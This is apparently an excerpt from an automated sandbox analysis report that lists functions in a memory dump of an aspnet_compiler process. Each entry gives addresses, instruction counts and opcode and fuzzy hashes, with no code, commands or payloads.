                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00e408b709f5ce90f503b9a64d09518ebfee1868424abc638fec2dd954489e0d
                                                              • Instruction ID: 8765ee913356950fa2b91dabd9fbfa739e852bbd1c6cf3a9e380f7c06ff9379d
                                                              • Opcode Fuzzy Hash: 00e408b709f5ce90f503b9a64d09518ebfee1868424abc638fec2dd954489e0d
                                                              • Instruction Fuzzy Hash: 7A819271E00616ABDB18CF69D940BBEBBF9FB88710F04852EE559D7640E334DA40CBA4
                                                              Function 01AAAB40 Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction ID: 306bcc70fffa6eb489704d6cc1f16d55a7e690f4ea34dba93ac41761bb12d772
                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction Fuzzy Hash: E8817E71A0020A9FDF19CF99C990ABEBBF2BF84310F588569D9169B345D734EA05CB90
                                                              Function 01A1E284 Relevance: .2, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1c25ceb78dd94c5e053329f164f34774aed94c862a7ae5bf500dedf16c6c69e
                                                              • Instruction ID: 6518dd9a3069e67ea0cd791af03654d22daa62dcf9cff5e2f7c95daf269b65f4
                                                              • Opcode Fuzzy Hash: a1c25ceb78dd94c5e053329f164f34774aed94c862a7ae5bf500dedf16c6c69e
                                                              • Instruction Fuzzy Hash: 5D816071A00609EFDB26CFA9C980BEEBBF9FF48354F144429E956A7254D730AC45CB60
                                                              Function 019FC640 Relevance: .2, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bbb622eeb376b45a4a114ba8ce062da66f880f32fb3c6135b75f2905084dcb68
                                                              • Instruction ID: 60816c6970d48feffdd08a1707355585e0ded747caca36ca7412fe153fd209e6
                                                              • Opcode Fuzzy Hash: bbb622eeb376b45a4a114ba8ce062da66f880f32fb3c6135b75f2905084dcb68
                                                              • Instruction Fuzzy Hash: 8671F375D06629EBCB25CF98D490BBEBBB4FF88710F14851EE996AB350D3349805CB90
                                                              Function 019F260B Relevance: .2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5feff32ac657496af62a574704861bcd5643f7483be77ee2510b6e27aced4e1c
                                                              • Instruction ID: cbd1291257aef359aa492547d899b26603d30942529534c5eeb22fbc860cdaf4
                                                              • Opcode Fuzzy Hash: 5feff32ac657496af62a574704861bcd5643f7483be77ee2510b6e27aced4e1c
                                                              • Instruction Fuzzy Hash: 4771C135604642AFD712DF28C484B2AB7E5FF89310F0485AEE999CB352DB38ED45CB91
                                                              Function 01A6035C Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction ID: a2f544de0a2e81c0b71b1e4df56520f395785d3b15f3427bd8f6a1c80dcca30c
                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction Fuzzy Hash: BC716E71E0061AEFDB10DFA9CA44E9EBBB8FF88710F114569E505E7290DB34EA41CB50
                                                              Function 01A762A0 Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 977a78451b2b1ebb9be5aa1ec74aa6bf368389ead722fc9ab734520120e44325
                                                              • Instruction ID: efdcca94e09bec4eeafd05dc20290f2b7bf6e0eeeaa02ccd1edaa2102fc4e51c
                                                              • Opcode Fuzzy Hash: 977a78451b2b1ebb9be5aa1ec74aa6bf368389ead722fc9ab734520120e44325
                                                              • Instruction Fuzzy Hash: 8B71D332240B01AFFB32DF18CD54F66BBB6EF44720F154518E65A8B2A1D775EA44CB50
                                                              Function 019E8AA0 Relevance: .2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 086b4cb28ff27789c9f6d13e1c4eed46aa4e2e06da5b806003aaf035bb4db58d
                                                              • Instruction ID: 5c9497018b6e15aa9c965137557503e74d54ad58e05bddd09aefc0e422373348
                                                              • Opcode Fuzzy Hash: 086b4cb28ff27789c9f6d13e1c4eed46aa4e2e06da5b806003aaf035bb4db58d
                                                              • Instruction Fuzzy Hash: 8981F172A05306CFDB25CF98E488BAD77F6BF88710F19416AE905AB291C7349D41CB90
                                                              Function 01A0CDF0 Relevance: .2, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                              • Instruction ID: 2f81a720f90364bc8d54a5b5428b273763e5dbb127eddbe23eb1b3107b24ef7c
                                                              • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                              • Instruction Fuzzy Hash: 52516F75E0064ADFCB15CF9CC5806FEBBB1FB88311F198169D915A7244D738AA41CB98
                                                              Function 01AA8DAE Relevance: .2, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 285a97d9e40d32bf0168e97f41160de0d64b84408ddfbc2e674f937ef85d1d52
                                                              • Instruction ID: 0558ad3aa2220e315bdda374efa5320fa325bdce1d66f0ce1895e9b7ed8ab9c9
                                                              • Opcode Fuzzy Hash: 285a97d9e40d32bf0168e97f41160de0d64b84408ddfbc2e674f937ef85d1d52
                                                              • Instruction Fuzzy Hash: DD51E4B26047029FD721DF28C840BABB7E5FF84351F44892CFA8597290D738E908CB95
                                                              Function 01A88350 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e57e57fa8f7a2a60b048b59671d2ef300f4372b374747c4d35b372bb7cdbd95
                                                              • Instruction ID: 8eb566cf339b89472c88d011973bfda615300c28fb1a33dbbfe34f8cc8d18cfc
                                                              • Opcode Fuzzy Hash: 8e57e57fa8f7a2a60b048b59671d2ef300f4372b374747c4d35b372bb7cdbd95
                                                              • Instruction Fuzzy Hash: 5C510170900705EFD720EF6AC880A6BFBF9FF94710F50461ED292976A2CBB4A944CB50
                                                              Function 01A1E443 Relevance: .2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee2e44e0122341b20a309c41fe1387525381a37f579a687ca673c5ac0ba722fe
                                                              • Instruction ID: 49b564f22e6da580fe25a352b27fdd3abb1da6fe3e5ddc9fce0de9763341cdef
                                                              • Opcode Fuzzy Hash: ee2e44e0122341b20a309c41fe1387525381a37f579a687ca673c5ac0ba722fe
                                                              • Instruction Fuzzy Hash: 1A519E71600A16EFCB22EF69C980F6AB3F9FF58794F45042EEA4697261D734E940CB50
                                                              Function 01A84180 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfea214f28f197392b551d83465e162cdd3e061f0c05b0376fcf14ddc27c47fe
                                                              • Instruction ID: fe64bbd30cad7c306d67c9640163a955499cee7128690746cca2d53d147973fb
                                                              • Opcode Fuzzy Hash: dfea214f28f197392b551d83465e162cdd3e061f0c05b0376fcf14ddc27c47fe
                                                              • Instruction Fuzzy Hash: FC5176716083429FD754EF29D880A6BBBE5FFD8218F444A2EF599C7250EB30D905CB92
                                                              Function 01A045B1 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction ID: f6acff19c508ef8892e0f5eb6a7d7e412d805ddff232f3d3225f928b6626f600
                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction Fuzzy Hash: 73519471E0021AABDF16DF98D540BEEBBB9FF89754F044069EA01AB290D774DD44CBA0
                                                              Function 01A6E9E0 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                              • Instruction ID: 0ed0da09114c0774b4f4d70c6f613bd62adea1281bc31a4c0a519f1ddce1dbc9
                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                              • Instruction Fuzzy Hash: 7B519875D0021AEFEF21DF94C994BAEBBBDAF00324F158665D61267190D7349E44CBA0
                                                              Function 01AA8B28 Relevance: .2, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31f3d758094515e8d732bb4a34f45e4a262113bed0f6f01538c69463f4989ea7
                                                              • Instruction ID: 8b80b1268b692a6ac8b33f8db7d980cdb5e877c05fce167523f5c28b68e0b74b
                                                              • Opcode Fuzzy Hash: 31f3d758094515e8d732bb4a34f45e4a262113bed0f6f01538c69463f4989ea7
                                                              • Instruction Fuzzy Hash: 544108707016019BE729DF2DC994B7FBB9AFF90622F888219E955C7280DB3CD801CB91
                                                              Function 01A6CBF0 Relevance: .1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f1eb79ec8a859b74c27c3811257f414a8220febc66eb74a9d73d755c237b188
                                                              • Instruction ID: 3a638fe669621e69ca4bff5b16fc99b1795b9d290e0f5c43f3d7a270af9f42f1
                                                              • Opcode Fuzzy Hash: 9f1eb79ec8a859b74c27c3811257f414a8220febc66eb74a9d73d755c237b188
                                                              • Instruction Fuzzy Hash: BE51A075A00216DFCB21DFA9C9809AEBBB9FF98324B154519D58AA3308E734FD05CBD0
                                                              Function 01A1A430 Relevance: .1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28b75ee36e91a86fc86e11a756241769f82ec6e69860a45a7f9b3bca89e705e5
                                                              • Instruction ID: e0ed03919514e13076de0f59ef7a8b3cb92a8a3f16b6708c801c2a3080cf19cf
                                                              • Opcode Fuzzy Hash: 28b75ee36e91a86fc86e11a756241769f82ec6e69860a45a7f9b3bca89e705e5
                                                              • Instruction Fuzzy Hash: E8414675746642ABCB2AEF78D980B6B3775EB64718F41002CEE0BDB24AD7B1D801C760
                                                              Function 01AAA9D3 Relevance: .1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                              • Instruction ID: fac133e6542072fda4f5b8da2950792c1216bf43abdda10c0ce63c5b8806b1ed
                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                              • Instruction Fuzzy Hash: CA410A71600716AFD725CF28C994A6BB7E9FF80310F49462EE91687640EB30ED08C7D0
                                                              Function 01A101F8 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9542d05d59f6fded41792ff58a72b52202442ece3f0089544f69cdd22952604
                                                              • Instruction ID: fc4856475821adc33957f4e73b74f8b32d2275450c9650c0f29b941a2bc79588
                                                              • Opcode Fuzzy Hash: b9542d05d59f6fded41792ff58a72b52202442ece3f0089544f69cdd22952604
                                                              • Instruction Fuzzy Hash: 6B41DD36E00219DBDB14DF98C640AEEBBB8BF48710F19812AF915FB244D7359D81CBA4
                                                              Function 01A0EBFC Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e88a7b9e7f41a31e16bd2e8a32c6558fcb729349d0463cd50d7787e73878322e
                                                              • Instruction ID: 19266e272007c49ab61e68db19e9db5264e5da99fd22b408a84c8a49bf8aa7f5
                                                              • Opcode Fuzzy Hash: e88a7b9e7f41a31e16bd2e8a32c6558fcb729349d0463cd50d7787e73878322e
                                                              • Instruction Fuzzy Hash: B941A1716047019FD725DF28D884A27B7F5FB88318F04482DE697C7651EB35E8489B91
                                                              Function 01A22750 Relevance: .1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                              • Instruction ID: 962a88c0f962d8b2ea961a4323a6e5de4dfcd859ad40bd789bcc2abcfb01f7d1
                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                              • Instruction Fuzzy Hash: F9515D75A04215CFCB55CF98C580AADFBF2FF84724F1882A9D915A7352D770AE81CB90
                                                              Function 019E6154 Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61b26d666ff632aed4caf19fdc4ab83e372fc1d7ef9e60d821765b0c1b4d419e
                                                              • Instruction ID: 9df8753e4a80e89670a6090feb093fdb4248d8d399ac82b78c0d3a65a0a0807a
                                                              • Opcode Fuzzy Hash: 61b26d666ff632aed4caf19fdc4ab83e372fc1d7ef9e60d821765b0c1b4d419e
                                                              • Instruction Fuzzy Hash: 6551E470904616DBDB268B28CD08BE8BBF5FF65314F1482A9E62D972D1D7349981DF80
                                                              Function 019E0BCD Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d8a5034b8519d6ebbb635fba16b03567ee45ac9144642cc93b77bea79a3157c
                                                              • Instruction ID: b1a4b895c3b2741adcff389855baf176bd8a11bca7095b13a1ec6e6aed5e5ce7
                                                              • Opcode Fuzzy Hash: 5d8a5034b8519d6ebbb635fba16b03567ee45ac9144642cc93b77bea79a3157c
                                                              • Instruction Fuzzy Hash: 47418031E003299BDB22DF68C948BEA77B8EF85750F0504A9E90DAB241D774DE85CF91
                                                              Function 01AA866E Relevance: .1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                              • Instruction ID: d45d74540a26d0d2ffb49b251a6535c888d36f5574d3d4f3ec89cceeb08500c0
                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                              • Instruction Fuzzy Hash: 5341B475B00205ABEB15DF99CD84ABFBFBAAF88641F544069E904E7341DB78DE00C7A0
                                                              Function 019E0887 Relevance: .1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa0154b0e8db8ce4bb016f579fd3b81e80f96ad0ab0244ba3456e0e78d041b53
                                                              • Instruction ID: e8cda72c76d1860dcdef214279d344f95d7cf198ab7702b12710ac254ce8a90a
                                                              • Opcode Fuzzy Hash: fa0154b0e8db8ce4bb016f579fd3b81e80f96ad0ab0244ba3456e0e78d041b53
                                                              • Instruction Fuzzy Hash: A641A1717007069FE326CF28C484A26B7F9FF89314B184A6DE54F87A50E7B1E845CB90
                                                              Function 01A0A470 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63f3f73c3341b6a331530d071ce1448c53be0a3db60d2f39d3788927b3dc9131
                                                              • Instruction ID: 2114cb4ab42281f177344d388d087e5667fba206dc8375b5464b526278b5a868
                                                              • Opcode Fuzzy Hash: 63f3f73c3341b6a331530d071ce1448c53be0a3db60d2f39d3788927b3dc9131
                                                              • Instruction Fuzzy Hash: 1041DC36941705CFDB22CF68E594BAD7BB0FB58720F094199D416AB2D1DB36A901CBA0
                                                              Function 019E8BF0 Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c6e7750e2a64b7d04b99ce1e41fc1b90a5513ba85316a7234355e0c3a2fe8c1
                                                              • Instruction ID: e4cf1dc372c9fd6c6ea28cf7b4ef559998ed85268c507b2180d16f3e17f9d572
                                                              • Opcode Fuzzy Hash: 6c6e7750e2a64b7d04b99ce1e41fc1b90a5513ba85316a7234355e0c3a2fe8c1
                                                              • Instruction Fuzzy Hash: E1412836901602DBD726DF88D888B5ABBF5FBDD700F14846EE5069B665C335D842CF90
                                                              Function 019D8918 Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c94f446fd8d29b74a4ed574d3b88495657827a43839f6ddd84e8965ad1d98e7
                                                              • Instruction ID: 0c2e90f6dd0a751dd2a845c32b0c317837f7a7d63f41ffff1252f8386af3b993
                                                              • Opcode Fuzzy Hash: 2c94f446fd8d29b74a4ed574d3b88495657827a43839f6ddd84e8965ad1d98e7
                                                              • Instruction Fuzzy Hash: BB417C315087069ED312DF69C940B6BB7E9EF88B54F41092EFA84D7251E730DE048BA3
                                                              Function 019DA020 Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                              • Instruction ID: 51e20ff0dadca2d8a750d4ee96c5601e80dbfed6a7157d460163cca51a13e1e0
                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                              • Instruction Fuzzy Hash: 95412831A04211EFEB21DF69C440BBABB72EBD1755F15C06AF9499B280D637DD90CBA0
                                                              Function 019E09AD Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b6c6183201ff8b02e7da9a2b883a959c757296f6dbb6751a6dcec890bb85f6d
                                                              • Instruction ID: e2e4b67c19b3d5f141e8ecd577c030c40d73748dbafc2d099e424166f9d817f4
                                                              • Opcode Fuzzy Hash: 2b6c6183201ff8b02e7da9a2b883a959c757296f6dbb6751a6dcec890bb85f6d
                                                              • Instruction Fuzzy Hash: 0B417C71600605EFD722DF18C844B26BBF8FF94714F28892AE54DCB251E770E942CB90
                                                              Function 01A10710 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                              • Instruction ID: 8d490fd0b87db3bfd0ea204c667c6cc8372a03269e740b87f4ad9835889f2512
                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
